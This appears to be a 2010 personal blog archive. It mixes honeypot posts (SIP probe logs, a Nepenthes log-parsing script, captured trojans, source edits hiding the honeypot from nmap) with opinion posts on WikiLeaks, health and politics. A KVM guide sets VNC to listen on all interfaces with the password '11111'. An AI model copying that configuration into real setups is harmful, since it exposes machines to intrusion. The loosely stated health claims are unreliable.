[29082010 19:50:44] sip dionaea/sip.py:827-info: SIP Session created
[29082010 19:50:44] sip dionaea/sip.py:801-debug: ('192.168.1.12', 5060, '202.103.52.147', 5060): b'OPTIONS sip:100@ SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.9:5060;branch=z9hG4bK-24798344;rport\r\nContent-Length: 0\r\nFrom: "sipsscuser"; tag=47165868797092908688927622311368018385018985010\r\nAccept: application/sdp\r\nUser-Agent: sundayddr\r\nTo: "sipssc"\r\nContact: sip:100@192.168.1.9:5060\r\nCSeq: 1 OPTIONS\r\nCall-ID: 267264826399318751054824843\r\nMax-Forwards: 70\r\n\r\n'
[29082010 19:50:44] sip dionaea/sip.py:1072-info: Received OPTIONS
[29082010 19:50:44] sip dionaea/sip.py:898-debug: Sending message "SIP/2.0 200 OK
To: "sipsscuser"; tag=47165868797092908688927622311368018385018985010
From: 100
Contact: 100
[29082010 19:50:44] sip dionaea/sip.py:962-debug: io_in: returning 409
[30082010 01:15:34] sip dionaea/sip.py:827-info: SIP Session created
[30082010 01:15:34] sip dionaea/sip.py:801-debug: ('192.168.1.12', 5060, '125.88.105.44', 5060): b'OPTIONS sip:100@ SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.9:5060;branch=z9hG4bK-13198307;rport\r\nContent-Length: 0\r\nFrom: "sipsscuser"; tag=19358999374944096893129611830352363137663012687\r\nAccept: application/sdp\r\nUser-Agent: sundayddr\r\nTo: "sipssc"\r\nContact: sip:100@192.168.1.9:5060\r\nCSeq: 1 OPTIONS\r\nCall-ID: 267264826399345328022532865\r\nMax-Forwards: 70\r\n\r\n'
[30082010 01:15:34] sip dionaea/sip.py:1072-info: Received OPTIONS
[30082010 01:15:34] sip dionaea/sip.py:898-debug: Sending message "SIP/2.0 200 OK
To: "sipsscuser"; tag=19358999374944096893129611830352363137663012687
From: 100
Contact: 100

Dionaea can handle sip attacks. Some people in China (202.103.52.147 maps to the CHINANET Hubei province network and 125.88.105.44 maps to CHINANET Guangdong province network) have modified sipvicious, altered the User Agent to sundayddr, and are probing various networks looking for private PBXs to hijack.

Dionaea is quite promising, but it's still very much a work in progress. It'll be a while before there's a Debian or RPM binary package for it.

Tiger Cub Found in Woman's Luggage

2010-08-26T22:42:00.005-05:00

Thai officials found a sedated live two month old tiger cub in a woman's luggage. She was trying to smuggle the cub out of the country. The woman was boarding a flight to Iran, but it is not known what the final destination for the cub was. If it was a wild tiger cub, it's likely an orphan now.Traffic.org has a blurb about the cub and they were the organization that supplied the photo to the news outlets. Here's an update from the BBC.

Paul McLeary Interview on the Arctic Arms Race

2010-08-26T22:06:00.006-05:00

The entire Keiser Report is at this link. I have edited out the first part of the show which is opinion and news commentary. While the Russians are in the best position currently to exploit the Arctic, the Chinese have started building icebreakers as well which I find surprising. Paul McLeary's blog, War, Security, COIN, and Stuff is a blog specializing on American national security.

SIPRNet and JWICS were Massively Infected in 2008

2010-08-25T19:24:00.004-05:00

Wired has a story about how the US military's secure networks were compromised by a known worm from 2007 via USB thumb drives in 2008. Here are some thoughts below.

Suggested solutions to the military's network security problems:

1. Quit issuing Windows laptops to people who use secret military networks. Make them use Linux (Ubuntu/RedHat), Apple OS, FreeBSD, anything but Windows. That cheap operating system can be replaced by an even cheaper one that is not as vulnerable and the government has people who can make the OS secure and as easy to use as Windows.

2. If you can't stop people from using Windows, then issue them a CD like the F-Secure Rescue CD. Customize the CD so that it writes a log file to the hard drive after it is used every time. Have a Windows login script running on sensitive networks such that a query is made for the presence of the file and a check is performed that the hard drive was scanned within the last 24 hours or some defined time interval. If the results are negative, access is only allowed for the F-Secure CD to download up-to-date virus definitions for scanning. The user is denied access until the system is checked and verified. It won't entirely stop infections from occurring since a virus or worm that is not in the passive scanner's database will not be discovered, but it will stop of lot of trivial and known attacks.

3. Do not have your secret military network directly connected to the wider Internet.

4. Run honeypots on the network. Any IP address that connects to them and uploads a worm should be immediately knocked off the sensitive network (DHCP license revoked or switch port turned off. Yes, the technology exists.) A message should be sent to the infected system telling the user to contact IT Security immediately.

5. Diversify your servers and harden them. Have a separate Windows domain for laptop systems to authenticate to as an additional safeguard to protect your Windows DCs on the main secure networks. Use Samba or a commercial solution that uses Samba for the domain controller if possible. That way, if the domain controllers are compromised on the laptop domain, you only have to rebuild those domain controllers and not your primary domain controllers on the main networks. I have seen a very secure network compromised by one compromised laptop and the only fix was to rebuild the domain controllers and change everyone's passwords. That's a lot of work for one slip up.

Links:
1. F-Secure Rescue CD
2. Adaptive Network Countermeasures
3. Adaptive Network Countermeasures Slide Presentation
4. Samba

Sugar: The Bitter Truth

2010-08-22T17:26:00.003-05:00

Fructose is a toxin like alcohol, but you don't even get a buzz from the high. This is a 1.5 hour long lecture and it has quite a bit of biochemistry. The take home lesson is

1. There's so much sugar in soft drinks to cover up the taste of the salt. The elevated salt is to make the drinker thirstier.
2. Fructose stimulates lipid biosynthesis in the liver.
3. Fructose turns off hepatic insulin signal recognition which leads to Type II diabetes.
4. These fructose effects lead to more hypertension and cardiovascular disease from increased fat.

The solution is drink more water, eat more fiber, and exercise more to change your liver metabolism. Exercise will not burn enough fat, but it prevents the fat from being made from the fructose.

Sharpie Liquid Pencil

2010-08-19T22:04:00.000-05:00

It's a pen. No, it's a pencil!

Flashplugin Woes

2010-08-17T15:06:00.002-05:00

If your flash player suddenly quit functioning in your Firefox browser and you run a 64-bit version of Debian Linux, visit this Flashplayer wiki for the fixes.

Be Serene and Patient

2010-08-17T14:50:00.002-05:00

From The Daily Zen:

Don't be surprised,
Don't be startled;
All things will arrange
Themselves.
Don't cause a disturbance,
Don't exert pressure;
All things will clarify
Themselves.

- Huai-nan-tzu

Hostile Traffic

2010-08-17T13:52:00.006-05:00

Attacks script:

#!/bin/bash
IPADDR=`ifconfig -a | grep "inet addr:" | grep -v 127.0.0.1 | awk '{ print $2 }' | sed -e 's/^addr://'`
#Debugging $IPADDR variable
#echo $IPADDR
echo "This script parses the nepenthes.log file for various attacks."
echo "It uses the IP address of the honeypot that created that log file"
sleep 1s
echo Listing of Attacks
echo "Date Attacker:Port Honeypot:Port"
echo ----------------------------------------------------------
grep accept /var/log/nepenthes.log | grep -v TCPSocket::acceptConnection | grep -v "spam net handler" | grep -v "debug net mgr" | grep -v "Connection Socket" | awk '{ print $1, $2, $3="", $9, $10, $11 }' | grep -v logged > /tmp/connect.tmp
grep $IPADDR /tmp/connect.tmp > /tmp/attacks.log
rm -rf /tmp/connect.tmp
cat /tmp/attacks.log
echo ----------------------------------------------------------
echo Approximate number of attacks:
cat /tmp/attacks.log | wc -l
echo ----------------------------------------------------------
echo Listing of Top 25 FTP Attacks
echo "# of Attacks IP Address of Attacker "
echo ----------------------------------------------------------
cat /tmp/attacks.log | grep $IPADDR:21$ | awk '{ print $3 }' | sed -e 's/:[0-9]*//' | sort -n | uniq -c | sort -n | tail -25
echo ----------------------------------------------------------
echo Listing of Top 25 SMTP Attacks
echo "# of Attacks IP Address of Attacker "
echo ----------------------------------------------------------
cat /tmp/attacks.log | grep $IPADDR:25 | awk '{ print $3 }' | sed -e 's/:[0-9]*//' | sort -n | uniq -c | sort -n | tail -25
echo ----------------------------------------------------------
echo Listing of 25 HTTP Attacks
echo "# of Attacks IP Address of Attacker "
echo ----------------------------------------------------------
cat /tmp/attacks.log | grep $IPADDR:80 | awk '{ print $3 }' | sed -e 's/:[0-9]*//' | sort -n | uniq -c | sort -n | tail -25
echo ----------------------------------------------------------

Using the above script which parses the /var/log/nepenthes.log file, one can get a summary of attacks on the honeypot. There appears to be a lot of traffic on the DCOM Service Control Manager port, port 135, after filtering out false positives from my laptop connecting to the honeypot due to the nmap test scans from yesterday.

root@apollo:~# ./attacks | grep :135 | grep -v 192.168.1.14:
[16082010 19:59:18 71.14.44.68:1810 -> 192.168.1.6:135
[16082010 19:59:18 71.14.44.68:4422 -> 192.168.1.6:135
[16082010 23:13:13 222.186.24.11:4613 -> 192.168.1.6:135
[16082010 23:13:14 222.186.24.11:4706 -> 192.168.1.6:135
[17082010 00:40:57 71.53.68.156:4936 -> 192.168.1.6:135
[17082010 00:40:57 71.53.68.156:1052 -> 192.168.1.6:135
[17082010 00:40:58 71.53.68.156:1256 -> 192.168.1.6:135
[17082010 04:15:17 71.55.245.220:2317 -> 192.168.1.6:135
[17082010 04:15:18 71.55.245.220:2336 -> 192.168.1.6:135
[17082010 04:15:18 71.55.245.220:2408 -> 192.168.1.6:135
[17082010 08:03:46 66.109.27.101:1617 -> 192.168.1.6:135
[17082010 08:03:49 66.109.27.101:2557 -> 192.168.1.6:135
[17082010 11:03:02 222.45.112.221:2359 -> 192.168.1.6:135
[17082010 11:03:03 222.45.112.221:2454 -> 192.168.1.6:135
[17082010 12:01:24 71.41.99.54:2899 -> 192.168.1.6:135
[17082010 12:01:25 71.41.99.54:3063 -> 192.168.1.6:135
[17082010 12:01:25 71.41.99.54:3175 -> 192.168.1.6:135
[17082010 13:49:17 71.41.107.253:4482 -> 192.168.1.6:135
[17082010 13:49:18 71.41.107.253:4512 -> 192.168.1.6:135
[17082010 13:49:18 71.41.107.253:4580 -> 192.168.1.6:135

Here's a summary thus far of attacks against common ports:

----------------------------------------------------------
Listing of Top 25 FTP Attacks
# of Attacks IP Address of Attacker
----------------------------------------------------------
1 221.226.17.14
6 125.45.109.166
----------------------------------------------------------
Listing of Top 25 SMTP Attacks
# of Attacks IP Address of Attacker
----------------------------------------------------------

----------------------------------------------------------
Listing of 25 HTTP Attacks
# of Attacks IP Address of Attacker
----------------------------------------------------------
2 88.191.70.74
----------------------------------------------------------

Please note that the script doesn't discriminate between a port enumeration scan and an attack. However, since the system is a honeypot, almost all external connections to it can be considered hostile in intent.

Here are the infected systems that attempted to upload a worm payload to the honeypot.

root@apollo:~# ./total*
All Infected Systems Sorted by Virulence
Events IP Address
==================
1 58.53.128.61
1 71.41.107.253
1 71.41.231.251
1 71.41.99.54
1 71.55.245.220
1 71.91.137.62
2 125.45.109.166
2 71.53.68.156
4 58.218.204.110

There is one variant of worm propagating on my ISP's subnet (Verizon.net).

root@apollo:~# cd /var/lib/nepenthes/binaries
root@apollo:/var/lib/nepenthes/binaries# clamscan .
./f8815cdca238ad5ab566f05f5a6335a4: Trojan.Agent-167520 FOUND
./bb39f29fad85db12d9cf7195da0e1bfe: Trojan.Agent-167520 FOUND
./14a09a48ad23fe0ea5a180bee8cb750a: Trojan.Agent-167520 FOUND

Searching www.virustotal.com with one of the hashes shows that the trojan is well known and analyzing it with CWSandbox shows it to be almost three years old. These systems are owned and likely don't have current antivirus software installed on them. Considering that free AV products exist such as Clamwin or AVG, this is a shame as it gives the crooks a toehold unless Verizon is blocking the traffic which is doubtful. I have no idea whether the Command and Control server for this trojan is still functional.

I am hoping that my modified version of nepenthes is fully functional. If it can not download hexdumps of shellcode attacks, I'll be forced to uninstall the modified modules and replace them with the normal modules that can be enumerated by nmap.

Unemployment By County From 2007-2010

2010-08-17T02:53:00.003-05:00

Graphical depiction of unemployment rates by county from January 2007 to May 2010.

Modifying Nepenthes to Prevent Nmap Enumeration

2010-08-17T00:33:00.019-05:00

I decided to build a Linux KVM honeypot using nepenthes. From earlier tests, I knew that nmap could detect a nepenthes honeypot via a string in the fake FTPd service. Unfortunately, a second signature has been added. The two signatures in the nmap-service-probes file are:

match ftp m|^220 ---freeFTPd 1\.0---warFTPd 1\.65---\r\n| p/Nepenthes HoneyTrap fake vulnerable ftpd/ ,

and

match netbios-ssn m|^\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$| p/Nepenthes fake honeypot netbios-ssn/ .

One can use a hex editor to alter the affected string in the vuln-ftpd.so binary, but it's practically impossible to do the same for the vuln-netdde.so binary. Therefore, I undertook the exercise of modifying the source code. After wasting several hours modifying the original source code, I finally found an easy solution. It should take less than an hour to modify and build a nepenthes Debian binary package with these directions assuming that the source code isn't too old using the g++-4.4 compiler.

1. Uncomment the deb-src entry in /etc/apt/sources.list or debian.list in /etc/apt.sources.d. Then type the following commands to create a directory and download the source:

# mkdir -p /tmp/source
# cd /tmp/source
# apt-get update ; apt-get source nepenthes

2. You will then have a new subdirectory called nepenthes-0.2.2 and three other files called nepenthes_0.2.2-5.diff.gz, nepenthes_0.2.2.orig.tar.gz, and nepenthes_0.2.2-5.dsc.

3. Install the following files to meet any package dependencies:

# apt-get install libcurl3-dev libmagic-dev libpcre3-dev libadns1-dev libpcap0.8-dev iptables-dev autoconf automake1.9 autotools-dev libtool libpcap-dev libssh-dev bison flex libcap2-dev dpatch

4. Change directory to nepenthes-0.22/modules/vuln-ftpd

# cd nepenthes-0.22/modules/vuln-ftpd

5. Using your favorite editor, alter the following line in vuln-ftpd.cpp,

const char * banner1 = "220 ---freeFTPd 1.0---warFTPd 1.65---\r\n";
to
const char * banner1 = "220 ---fbsdFTPd 1.0---warFTPd 1.65---\r\n";

6. Repeat steps four and five on the NETDDEDialogue.cpp file in the vuln-netdde modules subdirectory (../nepenthes-0.22/modules/vuln-netdde/NETDDEDialogue.cpp). In the following switch statement,

case NETDDE_NULL:
{
char reply[64];
memset(reply,0,64);
reply[0]=0x82;
msg->getResponder()->doRespond(reply,64);
m_State = NETDDE_SHELLCODE;
}
break;

change reply[0]=0x82; to reply[0]=0x81; so that it looks like this:

case NETDDE_NULL:
{
char reply[64];
memset(reply,0,64);
reply[0]=0x81;
msg->getResponder()->doRespond(reply,64);
m_State = NETDDE_SHELLCODE;
}
break;

7. Repeat step 6 on the MSMQDialogue.cpp file in the vuln-msmq module. The same switch statement was also used in that file as well. If you don't change it, the netbios-ssn nmap signature will be triggered on tcp ports 2103, 2105, and 2107.

case MSMQ_NULL:
{
char reply[64];
memset(reply,0,64);
reply[0]=0x82;
msg->getResponder()->doRespond(reply,64);
m_State = MSMQ_SHELLCODE;
m_Buffer->clear();

}
break;

Change reply[0]=0x82; to reply[0]=0x81; so that it looks like this:

case MSMQ_NULL:
{
char reply[64];
memset(reply,0,64);
reply[0]=0x81;
msg->getResponder()->doRespond(reply,64);
m_State = MSMQ_SHELLCODE;
m_Buffer->clear();

}
break;

8. Change directory to the sqlhandler-postgres subdirectory within the modules directory. In the sqlhandler-postgres.cpp file, add the cstdlib include statement

#include "<"cstdlib">" (w/o quotation marks)

as the last include statement before the using namespace nepenthes; statement.

9. Change directory to the parent source directory, i.e. /tmp/source/nepenthes-0.22. Execute
dpkg-buildpackage -rfakeroot -uc -b, i.e.

#dpkg-buildpackage -rfakeroot -uc -b

You should not get any errors during the package build. If you do, they will be either unmet package dependencies and the dpkg-buildpackage program will tell you which packages you are missing and to run apt-get install to fix them, or you will get a make error which causes program termination. Take note of what error caused make to terminate. Chances are that you are missing an include statement that is not patched with the current source code patches by dpkg-buildpackage (see step 8). Note the file that the error occurred in. Search Google with words from the error message. If it is a scope error, google the keyword word in single quotes along with C++, i.e. "malloc C++" to find the library that defines the keyword malloc.

10. Once dpkg-buildpackage is finished, the deb package, nepenthes_0.2.2-5_amd64.deb in my case, will be found in the source directory /tmp/source. You can install it with dpkg:

#dpkg -i nepenthes_0.2.2-5_amd64.deb

11. Run nmap to test your installed modified honeypot:

#nmap -sV 192.168.1.6

Starting Nmap 5.21 ( http://nmap.org ) at 2010-08-16 23:30 CDT
Nmap scan report for 192.168.1.6
Host is up (0.00078s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp
22/tcp open ssh OpenSSH 5.5p1 Debian 4 (protocol 2.0)
25/tcp open smtp?
42/tcp open nameserver?
80/tcp open http?
110/tcp open pop3?
135/tcp open msrpc?
139/tcp open netbios-ssn?
143/tcp open imap?
443/tcp open https?
445/tcp open microsoft-ds?
465/tcp open smtps?
993/tcp open imaps?
995/tcp open pop3s?
1023/tcp open netvenuechat?
1025/tcp open NFS-or-IIS?
2103/tcp open zephyr-clt?
2105/tcp open eklogin?
2107/tcp open unknown
3372/tcp open msdtc?
5000/tcp open upnp?
6129/tcp open unknown
10000/tcp open snet-sensor-mgmt?
6 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi

Update (08/24/10): To test hexdump functionality, use netcat to send arbitrary text strings to test hexdump functionality. For example,

nc localhost 445
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Ctrl-C

should suffice, then ls -al /var/lib/nepenthes/hexdumps to see if a bin file exists. One can also do tail -20 /var/log/nepenthes.log to verify that nepenthes logged the hexdump capture. Performing the netcat test from my laptop to the honeypot showed that my changes did not affect the download functionality. It seems however that Verizon is filtering traffic because I am not seeing any hexdumps thus far.

Misleading Headline

2010-08-15T02:25:00.005-05:00

The LA Times has a story with the headline, "Medical treatment carries possible side effect of limiting homosexuality". A more accurate headline would be "Medical treatment eliminates painful surgery for female infants". The hormonal treament is a crude attempt to treat congenital adrenal hyperplasia, a defect in 21-hydroxylase, which affects 1 in 15,000 infants. The infants are homozygous recessive for the defective autosomal (non sex chomosome) allele, i.e. they have two bad copies of the gene. Male infants need hormone replacement. The severest form of the deficiency leads to loss of sodium leading to severe dehydration. The problem lies with the girl infants. Their brains and gonadal tissues are exposed to increased amounts of steroidal hormones that can result in masculinization in severest cases. In other words, the person is genetically female, but thinks and acts male. There are also gradations in between "normal" female and "male" female as far as clinical outcomes. In other words, the disease is both a pathological and a developmental one. Critics are complaining that this is treatment will limit homosexuality. I'm sorry, but just about every woman wants a healthy normal baby. Some will choose to carry a sick fetus to term, raise it, and give it a loving life. That is their moral choice as a parent. But many will choose either to abort the fetus or opt for the treatment. The treatment is carried out on girls to prevent developmental abnormalities in female infants that lead to surgical intervention. Whether or not the child becomes homosexual in later life is up to the individual and environmental factors, despite the underlying genetic factors. While doctors are not supposed to do any harm, not treating this known condition will cause more harm because the affected infants have a real condition that makes them sick. If you are given a pill to avoid painful surgery for your baby or aborting the fetus, isn't that alleviating physical suffering of the baby? If they could correct the genetic defect, then the critics will complain that doctors are genetically alterring the sexual orientation of the baby. The criticisms are only valid if you are knowingly taking the medicine for the sole purpose of surpressing a possible homosexual outcome for your child, and that is all you were told by the medical staff. But doctors have no way to gauge the severity of the disease prenatally. So, I believe that this is making a mountain out of a molehill.

Ubuntu, ATI Graphics Cards, and aticonfig

2010-08-13T21:22:00.005-05:00

Ubuntu version 10.04.1 LTS has an option to install proprietary drivers. Unfortunately, it does not work well with the ATI HD3300 series graphic chip on my M4A78T-E Motherboard. When I ran aticonfig --initial -f and tried to use the xorg.conf file it generated, the X11 server would generate a fatal error and die. So, in my case, aticonfig was generating a useless xorg.conf configuration file. I downloaded a Knoppix CD iso and burned a CD. Klaus Knopper has designed a pretty good program that probes video hardware and enumerates settings and then writes an xorg.conf file. I ran the CD on my system and recovered the generated xorg.conf file. I then copied and pasted everything except for the entries that corresponded to the aticonfig generated xorg.conf entries into the latter file. The hybrid xorg.conf file is below:

Section "ServerLayout"
Identifier "aticonfig Layout"
Screen 0 "aticonfig-Screen[0]-0" 0 0
### AIGLX for compiz 3D-Support with DRI & Composite
### This option doesn't hurt even if it's not supported by the individual card
Option "AIGLX" "true"
EndSection

Section "ServerFlags"
Option "AllowMouseOpenFail" "true"
Option "DPMS" "true"

EndSection

Section "Files"
ModulePath "/usr/lib/xorg/modules"
FontPath "/usr/share/fonts/X11/misc:unscaled"
FontPath "/usr/share/fonts/X11/75dpi:unscaled"
FontPath "/usr/share/fonts/X11/100dpi:unscaled"
FontPath "/usr/share/fonts/X11/Type1"
FontPath "/usr/share/fonts/X11/Speedo"
FontPath "/usr/share/fonts/X11/PEX"
# Additional fonts: Locale, Gimp, TTF...
FontPath "/usr/share/fonts/X11/cyrillic"
# FontPath "/usr/share/fonts/X11/latin2/75dpi"
# FontPath "/usr/share/fonts/X11/latin2/100dpi"
# True type and type1 fonts are also handled via xftlib, see /etc/X11/XftConfig!
FontPath "/var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType"
FontPath "/usr/share/fonts/truetype"
FontPath "/usr/share/fonts/latex-ttf-fonts"
EndSection

Section "Module"
# Comments: see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=346408
Load "dbe" # Double Buffering Extension, very important.
Load "dri" # This shouldn't be available choice if user has selected driver vga, vesa or nv.
Load "glx" # GLX Extension.
Load "freetype" # Freetype fonts.
Load "type1" # Type 1 fonts
Load "record" # Developer extension, usually not needed
Load "extmod" # This is okay, but if you look into "man xorg.conf" you'll find option NOT to include DGA extension with extmod, and for a good reason.. DGA causes instability as it accesses videoram without consulting X about it.
SubSection "extmod"
Option "omit xfree86-dga"
EndSubSection
# Load "speedo" # Speedo fonts, this module doesn't exist in Xorg 7.0.17
# The following are deprecated/unstable/unneeded in Xorg 7.0
# Load "ddc" # ddc probing of monitor, this should be never present, as it gets automatically loaded.
# Load "GLcore" # This should be never present, as it gets automatically loaded.
# Load "bitmap" # Should be never present, as it gets automatically loaded. This is a font module, and loading it in xorg.conf makes X try to load it twice.
EndSection

Section "Extensions"
# compiz needs Composite, but it can cause bad (end even softreset-resistant)
# effects in some graphics cards, especially nv.
Option "Composite" "Enable"
EndSection

Section "Monitor"
Identifier "aticonfig-Monitor[0]-0"
Option "VendorName" "ATI Proprietary Driver"
Option "ModelName" "Generic Autodetecting Monitor"
Option "DPMS" "true"
EndSection

Section "Device"
Identifier "aticonfig-Device[0]-0"
Driver "fglrx"
BusID "PCI:1:5:0"

# compiz, beryl 3D-Support with DRI & Composite
Option "XAANoOffscreenPixmaps"
Option "AllowGLXWithComposite" "true"
Option "EnablePageFlip" "true"
Option "TripleBuffer" "true"

# Tweaks for the xorg 7.4 (otherwise broken) "intel" driver
Option "Tiling" "no"
Option "Legacy3D" "false"

# These two lines are (presumably) needed to prevent fonts from being scrambled
Option "XaaNoScanlineImageWriteRect" "true"
Option "XaaNoScanlineCPUToScreenColorExpandFill" "true"
EndSection

Section "Screen"
Identifier "aticonfig-Screen[0]-0"
Device "aticonfig-Device[0]-0"
Monitor "aticonfig-Monitor[0]-0"

Option "AddARGBGLXVisuals" "true"
Option "DisableGLXRootClipping" "true"
SubSection "Display"
Depth 1

EndSubSection
SubSection "Display"
Depth 4

EndSubSection
SubSection "Display"
Depth 8

EndSubSection
SubSection "Display"
Depth 15

EndSubSection
SubSection "Display"
Depth 16

EndSubSection
SubSection "Display"
Depth 24

EndSubSection
SubSection "Display"
Depth 32

EndSubSection
EndSection

Section "DRI"
Mode 0666
EndSection

I am not sure why Canonical has not reverse engineered Knopper's program, but they ought to. Perhaps they should pay him for his program or a variant of it. It would solve a lot of display issues and X server problems that many users have.

Update:
Something is still broken. When I run fglrxinfo from the console, it segmentation faults.
I'm stumped, though I checked the Unofficial ATI Driver Wiki. Bummer!

Setting Up a Simple KVM/Libvirt Virtual Server

2010-08-13T01:36:00.011-05:00

Process to make a simple KVM virtual server running KVM and libvirt.

1. Install libvirt-bin and kvm (apt-get install libvirt-bin kvm virt-manager).
2. Remove Network Manager (apt-get remove network-manager network-manager-gnome).
3. Modify /etc/network/interfaces to create a bridge. Here's an example:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet manual

auto br0
iface br0 inet static
address 192.168.1.20
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1
bridge_ports eth0
bridge_fd 9
bridge_hello 2
bridge_maxage 12
bridge_stp off

Make sure /proc/sys/net/ipv4/ip_forward contains 1. You can modify /etc/sysctl.conf to make it permanent. For RedHat, you'll need to modify ifcfg-eth0 and create an ifcfg-br0 file to create the bridge.

4. Append vnc_listen = "0.0.0.0" to the /etc/libvirt/libvirtd.conf file.

5. Modify your KVM domain's XML file. Change

graphics type='vnc' port='-1' autoport='yes'

to

graphics type='vnc' port='5900' autoport='yes' listen='0.0.0.0' keymap='en-us' passwd='11111'

6. Restart networking, /etc/init.d/networking restart or service network restart.

7. Restart libvirt-bin, /etc/init.d/libvirt-bin restart or service libvirt-bin restart.

You should now be able to login remotely to your virtual machine using a vnc client like vinagre provided the ufw or iptables is disabled. How to configure iptables properly is beyond the scope of this post. Section 17.4 in the RedHat Virtualization Guide details which ports to open in iptables. This is not the most secure setup since it relies on passwords to secure libvirt's implementation of vncserver, so keep it behind a firewall for safety. I could not find one set of instructions on how to make the default configuration into a server at all.

William K. Black Interview on The Keiser Report

2010-08-12T17:19:00.005-05:00

Max Keiser interviews Professor William K. Black. The video below is just the interview itself. The entire show is here.

What is in insurance.aes256 and What is it For?

2010-08-11T15:41:00.013-05:00

Wikileaks has published a file called insurance.aes256. What is the file for and what does it mean? Many people have speculated about the purpose of the file's existence. My guess is that the file is part of a get out of jail free card for Bradley Manning, though it could be an insurance policy just for Assange and Wikileaks itself. The file itself is an encrypted 7zip archive about 1.4 GB in size. Unless the NSA knows something the experts do not, the insurance.aes256 archive will remained encrypted until Wikileaks releases the key. I'm speculating that the file archive may just contain a list of files taken with some videos thrown in as proof, although the HuffPost piece says that there could be a lot of documents in the archive from the size of the file alone. The contents are likely damning and embarrassing evidence of high level cover ups within the military and government and may prove how high the cover ups go. All of this is speculation, but it appears that the kid discovered things that bothered him morally. He took an oath to protect the Constitution of the United States when he joined the military. He may have discovered evidence that superiors were defying national or international laws. It appears that he had access to the DVD burner on his analyst workstation and that he smuggled the information out of his secured area on CDs disguised as music CDs. (One can't tell whether a CD is a data CD or an audio CD by looking at it.)

“I would come in with music on a CD-RW labeled with something like ‘Lady Gaga,’ erase the music then write a compressed split file,” he wrote. “No one suspected a thing and, odds are, they never will.”

“[I] listened and lip-synced to Lady Gaga’s ‘Telephone’ while exfiltrating possibly the largest data spillage in American history,” he added later. ”Weak servers, weak logging, weak physical security, weak counter-intelligence, inattentive signal analysis … a perfect storm.”

There were at least two failures of security here. He had access and permissions to use the DVD burner on his analyst system and he had a way to backup files to a CDRW. (Windows has this ability by default without the need of third party software like Nero.) Army physical security let him leave a secure facility without noticing that he brought a rewriteable CD to work in a secure facility. The first problem could have been solved by physically removing the DVD burners or enabling a software policy to disable the device. The second problem is more difficult to solve. It is difficult to police what goes in and out of a facility unless those items are banned from the workplace which evidently they weren't. They likely are now, though. I am guessing that USB drives were banned or locked down which necessitated the need to burn backup CDs or DVDs. No information went out over a secure network that we know of, and likely never did. He could have mailed the CDs or DVDs to whomever he pleased or found a way to transfer them to Wikileaks securely without being discovered or having the information compromised.

Network monitoring programs do not do a good job of intercepting and breaking encrypted communications. Sure, one can see the traffic, but assembling and decrypting it is another story unless you have the cryptographic keys. The NSA and other agencies have likely made some headway in this area, but if you are a guy like Brad Manning, you know the strengths and weaknesses of the systems that you are trained on. He avoided all of those traps by not using those networks to transfer files and made the IT Security and system administrators of a highly secure facility look like idiots. (To be fair though, insider threats are difficult to counter and are the most damaging. This still shows that military networks are not very well compartmentalized, thanks Microsoft!) He did this theft over some period of time which means he could have smuggled out gigabytes worth of information. Documents would not take up a lot of storage, but videos would. My guess is that he has smuggled out more than a few video files along with countless documents, and that most of his evidence is likely video files. We know of video evidence of at least one incident being suppressed. Perhaps that is all he smuggled out. Only he, Wikileaks, and the military know for sure. But we know from Pat Tillman's friendly fire death, that other cover ups have happened. So, it is possible that he's got the government and DOD in a bind and they are proceeding carefully until some accommodation can be reached or the threat of embarrassing disclosure is nullified. This would explain the initial outrage of the administration followed by complete silence. We've heard nothing about his incarceration or court martial. It's being kept very low key for now.

Hiroshima Atomic Blast Reenactment

2010-08-09T02:29:00.006-05:00

Sixty-five years ago on August 6, 1945, the United States destroyed an entire city with one plane and one bomb. Sixty-five years ago today, my people destroyed another city of people. Now, many countries can kill millions with the push of a button. Are we any wiser?

Using an Antifraud System to Commit Fraud

2010-07-28T14:05:00.002-05:00

Using antifraud systems to commit check fraud.

Social Security is not an Entitlement

2010-07-28T12:57:00.004-05:00

Social Security is not an entitlement. It is a form of retirement insurance that citizens are required by law to pay for and the government is required by law to distribute to retired citizens. Do not let the wealthy fund their bailout on the backs of the sick and elderly.

Jon Stewart's Take on the Afghanistan Wikileaks Episode

2010-07-28T12:45:00.003-05:00

Jon Stewart mocks the media reaction to the Afghanistan Wikileaks leak. Hmm, 95% of suicide bombers come from two religious schools in Peshawar. ISI is aiding the Taliban insurgents. We are funding our own attackers and their advisers. Is this the 2010 version of Catch-22? Remember in Catch-22, the Germans paid the Americans to bomb their own air base. How is this any different? And our MSM doesn't care. There's too much money to be made promoting the status quo.

The Monetary Cost of War

2010-07-27T20:55:00.003-05:00

There is an interesting graphic on Barry Ritholz's blog depicting the cost of war for Americans. Americans are paying $547,619/deployed soldier for Afghanistan and Iraq versus $254,658/deployed soldier for World War II. We deployed 16.1 million soldiers for four years during World War II versus 2.1 million soldiers for the current conflicts over 9 years. This is not even counting the people we have lost due to combat and suicide. What is sad is that had we not gone in to Iraq, we would not have squandered the advantage we gained in Afghanistan. As it is, Iran has won Iraq via cultural ties with the Shia majority. Meanwhile, we lose Afghanistan by losing the favor of the average Afghan due to bombing and killing his family and neighbors. Such is snatching defeat from the jaws of victory.

Enabling Bridged Networking in RedHat 6 Beta 2

2010-07-27T17:55:00.011-05:00

I decided to play around with the Redhat 6 beta 2 64 bit (x86_64) version since Xen is going away after RedHat version 5. Instructions on enabling bridged networking for a KVM server are rather scarce on the Internet and what few there are don't work well. Well, I found part of the answer here. In brief, perform the following steps:

# chkconfig NetworkManager off
# chkconfig network on
# service NetworkManager stop
# service network start
# cd /etc/sysconfig/network-scripts

Edit ifcfg-eth0 to read:

DEVICE=eth0
ONBOOT=yes
